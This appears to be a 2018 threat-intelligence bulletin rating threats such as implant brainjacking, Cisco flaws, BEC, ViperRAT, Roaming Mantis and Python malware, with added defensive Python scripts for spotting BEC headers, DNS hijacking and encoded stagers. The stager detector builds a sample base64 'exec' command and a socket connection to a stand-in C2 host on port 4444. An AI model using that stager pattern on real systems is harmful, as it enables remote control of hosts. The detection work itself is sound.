Target: Medical Devices

Attack Vector: Wireless Signal Interception

Summary: Brainjacking is the term for the compromise of an internet-connected medical implant. A number of medical devices are connected to the internet and therefore have the capacity to be compromised, such as pacemakers, defibrillators and intravenous drug delivery systems. Attacking the brain of a patient fitted with an implanted stimulation device has now been proven to be a potential target for actors. Threat actors could change the voltage the device delivers, which could easily invoke sensory changes or denial, other disabilities or, in extreme circumstances, death.

The devices use wireless protocols for programming updates and to receive medical data from the patient, which makes radio-based attacks a real possibility. Leakage of patient data, such as names and dates of birth, from compromised wireless signalling is also a real possibility.

In the current political climate, there could be a variety of reasons why a bad actor may wish to carry out a brainjacking attack. These include political, cyber warfare, extortion, blackmail, revenge or even perverted amusement.

Currently, it is not possible to use this technology to inject inferences into the patient’s brain. Further developments and enhanced software will enable patients’ brainwave behaviours to be analysed to facilitate more precise care delivery. Therefore, if these signals could be intercepted and reverse engineered, it has been theorised that future attacks could be used to inject an inference into the patient’s brain.

Risk assessment summary: This threat has been assessed as 3F MODERATE. An attack of this kind is unlikely, due to the extremely limited number of actors who could potentially look to exploit this weakness. In addition, the specialist nature of the equipment, and the fact that the target is an extremely small section of Internet of Things connected devices, also reduces the risk. However, given current political tensions, if this type of vulnerability could be exploited or developed further, it could have extremely serious consequences. Any such incident could pose a critical threat to life.


Cisco Flaws Discovered On Hardware Products As Well As Cisco Software

Target: Networking devices which have not rolled out Cisco patches, unpatched Cisco consumer software

Attack Vector: Exploitation of numerous detailed vulnerabilities

Summary: American industrial automation and information products supplier Rockwell Automation has recently disclosed a number of flaws within a range of switches it produces. Upon investigation, it found that the actual flaws stem from the switches’ use of Cisco software, which provides secure communications with enterprise networks; the vulnerabilities therefore reside within Cisco’s software.

Although these flaws were found on a specific router, they are due to the software the routers rely on and are therefore relevant to any routers which utilise Cisco software. Furthermore, three other flaws have been reported in Cisco client products which open up further attack vectors.

Risk assessment summary: The threat is assessed as 3d MODERATE. Whilst the threat to some Rockwell devices has been mitigated with patching, it will take time to roll out across enterprise networks. These vulnerabilities still present a danger: CVE-2018-0171 in particular has proved a popular attack vector and carries a high risk, with the ability to cause downtime on a system. Further vulnerabilities, such as CVE-2018-0151, have the potential to cause damage to an organisation through the opportunity they provide to leak data, further increasing the risk.

In addition, it is probable that other routers with similar vulnerabilities will be found, as they are also dependent on Cisco software. However, these devices will also have updates available; it is simply down to the organisation to roll out the patches Cisco supplies. The risk of attack on Cisco products is reduced if all patches have been applied.


Adwind Discovered in Two New Malware Packages Being Dropped via Spam Campaigns

Target: Various

Attack Vector: Phishing / Data Theft

Summary: Two new malware strains delivering Adwind have resulted in a number of different final payloads, including Loki, XTRAT and DUNIHI. Both campaigns have been designed to avoid detection whilst attempting to steal information. Both campaigns have been observed making use of a previously patched vulnerability, CVE-2017-11882.

Risk assessment summary: This threat is assessed at 3e MODERATE. Although there has been a large number of infections, the attack methods have been observed abusing a vulnerability for which patches are available. There is a risk that an infection could spread across a network. In addition to detection avoidance, both strains come with new information-stealing malware payloads, increasing the risk of loss of personal data and intellectual property.


#OpUSA active in early months of 2018

Target: Businesses within America or contributing to the country economically/politically

Attack Vector: DDoS attacks, Data breaches, website defacement, doxing

Threat Actor: Various, including @UnitedSecTeam, Phoenix420 and @Anonymous

Summary: Security Intelligence outlined the prospect of a reboot of the #OpUSA hacktivist campaign. The campaign focuses on the United States and is mainly driven by anti-American sentiment, in protest at US involvement in foreign wars, perceived corruption of the media, alleged war crimes and the creation of the financial crisis. Now, in April 2018, further hacktivist activity has been observed, with @Phoenix420 delivering effective DDoS attacks against targets and hacks and data leaks being carried out by @UnitedSecTeam.

Risk assessment summary: The threat is assessed as 3d MODERATE. This is one of a number of campaigns currently active and comes at a time of heightened diplomatic tension between the US, its allies and Russia. These tensions seem set to continue due to East and West involvement in the war in Syria and the investigations into Russian influence on Western elections, raising the threat level.

The USA is set to continue its involvement in Syria, giving further motivation for threat actors to continue campaigns against the West including #OpUSA, #OpUK and #OpPeaceForSyria. The US also seems bound to continue to support Israel, with President Trump congratulating the nation on its 70th birthday on the 18th of April, declaring the US had “no better friends anywhere”. This declaration of the close bond between the US and Israel is a provocative move likely to antagonise other nations in the Middle East, including allies of Russia such as Iran. This raises the possibility that some hacktivist activity may be used as a cover for state sponsored entities.


Russian APT activity remains focused on influence operations

Target: US/UK & France

Attack Vector: Hacks & Data Leaks/Phishing Campaign/Influence Operations

Threat Actor: Russian APT groups

Summary: During the current reporting period, international tensions between the UK, the US and Russia have remained at a high level as a result of the Sergei Skripal poisoning incident and the alleged chemical weapon attack in Douma, which resulted in British, French and American airstrikes being carried out against Syrian regime targets.

The recent publication of the joint UK/US technical alert TA18-106A, detailing how Russian APT actors have been compromising routers to gain access to a large number of networks, illustrates that the cyber domain is seen as a key battleground by state-sponsored entities. The document raises fears that Russia and allied nations may be preparing a major disruptive cyber-attack against UK targets in retaliation for Western action against the Assad regime. However, at the time of writing, the main focus of state-sponsored actors appears to remain the expansion of influence operations.

Risk assessment summary: It is currently assessed that Russian APT actors present a 2b HIGH threat. Whilst the recent technical advisory detailed ongoing Russian attempts to compromise systems, this should be considered ‘business as usual’, rather than a specific Russian response to the Skripal and Syria crisis.

Given the proximity of the Russia 2018 World Cup tournament, it is unlikely that Moscow would sanction a ‘digital Pearl Harbour’ unless the military situation in Syria leads to direct confrontation between Western and Russian military assets. If such a situation were to develop, especially one involving fatalities, then a ‘Critical’ cyber threat level would be appropriate.

At present, increased levels of information warfare appear to be the limit of Russian retaliation, and this is likely to remain the case until after the World Cup. System users should remain vigilant for any indicators of compromise on systems and be aware of the risk of plausible, socially engineered phishing emails. Additionally, any escalation in the military sphere in Syria is almost certain to result in a concurrent escalation in the cyber domain, which could result in disruptive attacks being initiated. Monitoring of the threat environment will continue in order to identify further actionable intelligence.


Gold Galleon Hacking Group demonstrates BEC is still a serious risk

Target: Companies with weaker security, for financial gain

Attack Vector: Business email compromise (BEC) attack

Summary: Researchers have identified the hacking group behind numerous wide-scale business email compromise (BEC) attacks that have cost businesses millions of dollars since last year. The group goes by the name Gold Galleon and appears to be a Nigeria-based group of at least 20 cybercriminals. The attackers take advantage of some industries’ negligent security and use of outdated software in order to prepare targeted emails with malicious attachments that compromise their victims. Although these attacks have focused on the maritime industry, the techniques and tools used are a risk to all, and the security failings that have allowed them to occur are found across all industries.

Risk assessment summary: This threat is assessed as 3e MODERATE. If successful, this BEC scam could be capable of stealing user credentials and causing financial loss for an organisation. It can impersonate the initially compromised victim, or someone in their address book, in order to further the exploit. BEC scams require minimal technical knowledge, malware or special tools, so the Gold Galleon hacking group can become expert in them very quickly. However, BEC scams are highly targeted attacks and it is unlikely they will attack companies with sufficient security systems and processes.
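The impersonation described in the summary above leaves traces in mail headers before any attachment is opened. As an added example (not part of the original bulletin, and not any vendor's detection logic), the following Python script scores an inbound message for three header-level BEC tells: a display name that matches a known contact while the sending address does not, a Reply-To that diverts replies to a different mailbox, and a sending domain within a small edit distance of the organisation's own domain. The contact directory, domain names and both messages are constructed for the example.

```python
"""Added example (not from the original bulletin): header-level checks for
business email compromise. Contacts, domains and messages below are
constructed for illustration."""
import email
from email.utils import parseaddr

# Constructed address book: normalised display name -> expected address.
KNOWN_CONTACTS = {
    "jane doe": "jane.doe@shipco.example",
    "accounts payable": "ap@shipco.example",
}
# Constructed list of the organisation's own domains.
OWN_DOMAINS = ["shipco.example"]


def levenshtein(a, b):
    """Plain edit distance, used to spot lookalike domains (shipc0 vs shipco)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_message(raw, contacts=KNOWN_CONTACTS, own_domains=OWN_DOMAINS):
    """Return a list of reasons the message looks like BEC; empty means clean."""
    msg = email.message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    findings = []

    # 1. Display name matches someone we know, but the mailbox does not.
    expected = contacts.get(name.strip().lower())
    if expected and expected.lower() != addr:
        findings.append(f"display name '{name}' matches {expected} but sender is {addr}")

    # 2. Replies are silently redirected to a different mailbox.
    reply_to = parseaddr(msg.get("Reply-To", ""))[1].lower()
    if reply_to and reply_to != addr:
        findings.append(f"Reply-To {reply_to} differs from From {addr}")

    # 3. Sender domain is a near miss of one of our own domains.
    for own in own_domains:
        if domain and domain != own and levenshtein(domain, own) <= 2:
            findings.append(f"sender domain {domain} is a lookalike of {own}")
    return findings


# Constructed sample messages; only the headers matter for these checks.
SUSPICIOUS = (
    "From: Jane Doe <jane.doe@shipc0.example>\n"
    "Reply-To: jane.doe@freemail.example\n"
    "To: ap@shipco.example\n"
    "Subject: Urgent: updated bank details for invoice 4471\n"
    "\n"
    "Please pay to the new account below.\n"
)
BENIGN = (
    "From: Jane Doe <jane.doe@shipco.example>\n"
    "To: ap@shipco.example\n"
    "Subject: Invoice 4471\n"
    "\n"
    "Attached as usual.\n"
)

if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, assess_message(raw) or ["no findings"])
```

The edit-distance threshold of 2 is an assumption chosen for the example; in practice it should be tuned against the organisation's legitimate partner domains so that near-neighbours such as regional subsidiaries are allowlisted rather than flagged.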


ViperRAT seen active on Google Play store once again

Target: Users of Google Play Store

Attack Vector: Malware disguised in seemingly innocuous application

Summary: ViperRAT is a Remote Access Trojan (RAT) utilised by APT groups. In June 2016 it was observed being used to target and collect information on the Israeli Defence Force, affecting over 100 Israeli soldiers, with over 8,000 files stolen. The malware was heavily scrutinised, received much attention from the media and analysts, and then disappeared. Given the target, original suspicions centred on the Palestinian group Hamas being behind the RAT, yet the malware and social engineering techniques seemed too advanced for Hamas and it is now assumed to be the work of a far more advanced threat actor, possibly Iranian. In April 2018, ViperRAT resurfaced in the Google Play Store in a seemingly more sophisticated evolution.

As the RAT is directly on the Google Play Store, it no longer has to be pushed onto victims’ devices as a third-party tool, which would require the user to enable installation; this is likely to result in more infections. The malware possesses intelligence gathering capabilities and communicates with a Command and Control (C&C) server, feeding collected information back to threat actors.

Risk assessment summary: Whilst the threat from this version of the malware is assessed as 4c LOW, the overall threat from the actors behind it is assessed as 3d MODERATE. Whilst the applications have been removed from the Google Play Store, questions remain over the security of Android’s application marketplace. The Google Play Store’s screening process for applications can be bypassed by mature threat actors, resulting in a high chance of consumers being exposed to this type of malware. This, coupled with the sheer volume of malicious applications created and used as a means of delivering malware, increases threats of this kind in the future. The risk from this malware is also significant, as it is able to control enough functions on a target device not only to collect a large amount of information, but also to push further malware to the target device’s contacts through SMS.

The future risk this malware may pose is significant. It is suspected that the threat actors behind the malware are Iranian, and this malware may be part of a larger campaign against the West. It is likely the malware will be evolved and delivered in a more sophisticated format, driving up the risk and likelihood.


Roaming Mantis malware

Target: Primarily Asia

Attack Vector: Mobile APKs

Summary: Roaming Mantis malware is designed to capture personal information from a target device, likely to aid fraudulent activity against the victim. The attacks are made possible via a compromised router that has had its DNS settings changed to point the target device to a compromised website, a technique known as DNS hijacking.

However, because the infected devices connect to Wi-Fi and to multiple routers, the propagation of this malware is likely to spread quickly through poorly administered devices.

Risk assessment summary: The threat is assessed as 4c LOW. According to telemetry obtained by Kaspersky Lab, there were more than 6,000 detections coming from just over 150 unique users, indicating a small and potentially targeted campaign to date; the likelihood is therefore lower at this stage, with no immediate indication of an increase in targets on a wider scale. The malware was predominantly designed to target Asian countries and is unlikely to have much success in English-speaking countries due to its heavily broken English, although future versions could easily improve the lures.

Because Android is the most common mobile operating system, it should not be underestimated how lucrative this malware could be, both to this group in the future and to other groups that could look to improve it, nor how widely it could be propagated via unsecured routers. The impact of a successful infection would be considered moderate, due to the level of access an actor would gain through both the inbuilt phishing techniques and access to call logs, messages, etc.
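The router-side DNS change described in this section is visible to a client that compares what it was handed over DHCP, and what those resolvers answer, with what it expects. As an added example (not part of the original bulletin or of Kaspersky Lab's tooling), the following Python script audits a dhclient-style lease for resolvers that are neither the gateway itself nor on a trusted list, and checks observed answers for well-known names against expected address ranges. The lease text, the trusted resolver and range lists, and the observed answers are all constructed for the example and use reserved documentation addresses.

```python
"""Added example (not from the original bulletin): audit the DNS settings a
router hands out over DHCP, and the answers those resolvers return, for the
rogue-resolver pattern used in DNS hijacking. The lease text, resolver
addresses and expected ranges are constructed for this example."""
import ipaddress
import re

# Constructed: the resolvers the organisation expects clients to receive.
TRUSTED_RESOLVERS = {"198.51.100.10", "198.51.100.11"}

# Constructed dhclient-style lease, with a second resolver quietly added.
SAMPLE_LEASE = """\
lease {
  interface "wlan0";
  fixed-address 192.168.1.23;
  option subnet-mask 255.255.255.0;
  option routers 192.168.1.1;
  option domain-name-servers 192.168.1.1, 203.0.113.53;
  renew 2 2018/04/24 10:00:00;
}
"""

# Constructed: where well-known names should resolve (CIDR ranges).
EXPECTED_RANGES = {
    "www.bank.example": ["198.51.100.0/24"],
    "updates.vendor.example": ["198.51.100.0/24", "192.0.2.0/24"],
}


def parse_lease(text):
    """Return (gateway, [resolvers]) from the last lease block in the file."""
    routers = re.findall(r"option routers ([^;]+);", text)
    servers = re.findall(r"option domain-name-servers ([^;]+);", text)
    gateway = ipaddress.ip_address(routers[-1].strip()) if routers else None
    resolvers = []
    if servers:
        resolvers = [ipaddress.ip_address(s.strip()) for s in servers[-1].split(",")]
    return gateway, resolvers


def audit_lease(text, trusted=TRUSTED_RESOLVERS):
    """Flag advertised resolvers that are neither the gateway nor on the trusted list."""
    gateway, resolvers = parse_lease(text)
    trusted_ips = {ipaddress.ip_address(t) for t in trusted}
    findings = []
    for r in resolvers:
        if r == gateway or r in trusted_ips:
            continue
        findings.append(f"gateway {gateway} advertises unexpected resolver {r}")
    return findings


def audit_answers(observed, expected=EXPECTED_RANGES):
    """Flag names whose observed answer falls outside the ranges we expect."""
    findings = []
    for name, answer in observed.items():
        ip = ipaddress.ip_address(answer)
        nets = [ipaddress.ip_network(n) for n in expected.get(name, [])]
        if nets and not any(ip in n for n in nets):
            findings.append(f"{name} resolved to {answer}, outside {', '.join(map(str, nets))}")
    return findings


# Constructed answers as a hijacked resolver might return them.
OBSERVED = {
    "www.bank.example": "203.0.113.77",       # outside the expected range
    "updates.vendor.example": "192.0.2.40",   # still within an expected range
}

if __name__ == "__main__":
    for line in audit_lease(SAMPLE_LEASE) + audit_answers(OBSERVED):
        print(line)
```

Treating the gateway's own address as an acceptable resolver is an assumption made here because consumer routers routinely advertise themselves; on a managed network the trusted list alone should be authoritative, and an unknown external resolver appearing in a lease is the signal to inspect the router's configuration.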


Growing use of Python malware hints at malware authors’ development

In 2018, there have already been several instances of malware components written in Python. This was a developing trend across 2017 and is widely seen as either lower-level actors trialling their hand at malware development or proof-of-concept work. However, recent developments suggest that the threat landscape has moved beyond just lower-level actors’ use of Python, with examples of the language becoming much more commonplace.

Strategic assessment:

PyCryptoMiner was the first example of this development in 2018. Identified by F5 Labs, the cryptominer had recently been developed to exploit CVE-2017-12149 on JBoss servers. Initially it used dictionary and brute-force attacks against the SSH login credentials of target Linux systems, deploying a base64-encoded Python script designed to connect to the C&C server. The additional payloads were also written in Python.

Palo Alto also identified a Python-based malware, dubbed “PowerStager”. Thematically, Python-based malware often targets Linux systems, most likely due to the development environments in which the malware was written. However, PowerStager generates Windows executables and then launches PowerShell scripts in order to execute a shellcode payload. It also had several configuration options, suggesting the authors were much more organised, and potentially more skilled, than previously seen.

The targeting of a Brazilian management institution by two different versions of CannibalRAT, written in Python, also highlights an example where potentially more skilled actors have switched to using Python. The code targeted INESAP users and, given its sole targeting of Brazil and use of obfuscation, Talos suggested it could have been for cyberespionage purposes.

It is noted that most malware making use of Python scripts relies on other languages for increased functionality. In the latest example, a backdoor identified by AlienVault, 50% of the code was found to be written in Python. However, the language’s ubiquitous use in malware development is an increasing trend, perhaps most poignantly seen in the GitHub DDoS ransom note. According to Cybereason, the note was written in a line of Python code that repeated multiple times.

Historically, Python-based malware was an indication of lower-skilled actors, as Python is viewed as a gateway language for learning to code. However, with more groups leveraging Python scripts in successful operations, this argument seems harder to sustain.
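The PyCryptoMiner paragraph above describes a stager delivered as a base64-encoded Python script, and that delivery style is something a defender can look for in process-execution telemetry regardless of who wrote the malware. As an added example (not part of the original bulletin, nor F5 Labs' or any vendor's detection content), the following Python script flags records in which a Python interpreter is launched with an inline script that base64-decodes and executes a blob, and decodes the blob so an analyst can read what it contained. The record format, host names, user names and the encoded stand-in script are all constructed for the example.

```python
"""Added example (not from the original bulletin): flag process-execution
records in which a Python interpreter is launched with an inline script that
decodes and executes a base64 blob, the delivery pattern described for
PyCryptoMiner, and decode the blob so an analyst can read it. The record
format, host names and sample command lines are constructed."""
import base64
import binascii
import re
from dataclasses import dataclass

# Interpreter invoked with an inline script (python -c, python3 -c, ...).
_INLINE_PY = re.compile(r"\bpython[0-9.]*\s+-c\b")
# A base64 literal of at least 40 characters handed to b64decode().
_B64_CALL = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]{40,})['\"]\s*\)")
# Dynamic execution of whatever was decoded.
_EXEC = re.compile(r"\b(exec|eval)\s*\(")
# Constructed record layout: "<host> pid=<n> user=<u> cmd=<argv>".
_RECORD = re.compile(r"(\S+)\s+pid=(\d+)\s+user=(\S+)\s+cmd=(.*)$")


@dataclass
class Finding:
    host: str
    pid: int
    user: str
    reason: str
    decoded: str


def decode_payload(cmd):
    """Return the decoded base64 script from a command line, or '' if none."""
    m = _B64_CALL.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""


def analyse(records):
    """Return a Finding for each record showing an encoded inline Python script."""
    findings = []
    for line in records:
        m = _RECORD.match(line)
        if not m:
            continue
        host, pid, user, cmd = m.group(1), int(m.group(2)), m.group(3), m.group(4)
        if not _INLINE_PY.search(cmd):
            continue
        reasons = []
        if _B64_CALL.search(cmd):
            reasons.append("base64-encoded inline script")
        if _EXEC.search(cmd):
            reasons.append("exec/eval of decoded content")
        if reasons:
            findings.append(Finding(host, pid, user, "; ".join(reasons), decode_payload(cmd)))
    return findings


# Constructed stand-in for an encoded stager: a reserved example host name and
# a three-line script that only illustrates what a decoded blob looks like.
_CONSTRUCTED_SCRIPT = (
    "import socket\n"
    "s = socket.socket()\n"
    "s.connect(('c2.example.invalid', 4444))\n"
)
_BLOB = base64.b64encode(_CONSTRUCTED_SCRIPT.encode()).decode()

# Constructed process-execution records: two benign, one matching the pattern.
SAMPLE_RECORDS = [
    "web01 pid=4101 user=www-data cmd=python3 manage.py runserver",
    'web01 pid=4102 user=deploy cmd=python3 -c "print(1 + 1)"',
    "web02 pid=7781 user=root cmd=python -c \"import base64;exec(base64.b64decode('"
    + _BLOB + "'))\"",
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_RECORDS):
        print(f"{f.host} pid={f.pid} user={f.user}: {f.reason}")
        print("  decoded:", f.decoded.strip().replace("\n", " | "))
```

The 40-character minimum on the literal is an assumption that keeps short, legitimate uses of b64decode out of the results; the decoded text is returned alongside the finding so that host names and ports in the stager can be fed into blocking or further hunting without re-running the payload.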


Anonymous Launch OpPeaceForSyria

Target: UK political organisations

Attack Vector: DDoS

Threat Actor: @Anonymous/@UnitedSecTeam

Summary: In response to airstrikes carried out against Syrian targets on the morning of Saturday 14th April 2018, the @Anonymous hacktivist collective has announced the launch of the cyber operation #OpPeaceForSyria. The aim of the operation is to show international opposition to the air strikes and to encourage citizens in Western countries to hold their governments to account regarding the military action.

Risk assessment summary: It is currently assessed that #OpPeaceForSyria presents a 3e MODERATE threat. Whilst most activity will comprise DDoS attacks, hacks, data leaks and website defacements may also be used against targeted organisations. At the time of writing no target list has been issued, but statements by @UnitedSecTeam suggest the group is planning on moving beyond smaller targets. As the group is ideologically driven with an anti-government agenda, politically linked organisations such as councils and government sector bodies are likely to be considered attractive targets.

Activists from the wider @Anonymous collective are almost certain to support the operation given the high profile of the attacks on Syria and the implications for global peace and security. A more worrying aspect of forthcoming hacktivist activity is that it may be used as a smokescreen for more damaging APT-related activity. Both Russian and Iranian actors have previously used the pretext of being a hacktivist group as cover for their activity; indeed APT28 have used the hashtag #OpOlympics during hacks and data leaks of sporting-related bodies such as WADA or the IOC. The group also claimed to be from the ISIS-linked UnitedCyberCaliphate during the service-affecting attack against the French media organisation TV5Monde.

Given that malicious state-sponsored entities may seek to complicate attribution during the current period of international tensions, it may be prudent to monitor hacktivist incidents more carefully, especially where such activity targets critical infrastructure or organisations. Monitoring of the threat environment will continue in order to identify any emerging target lists or other actionable intelligence.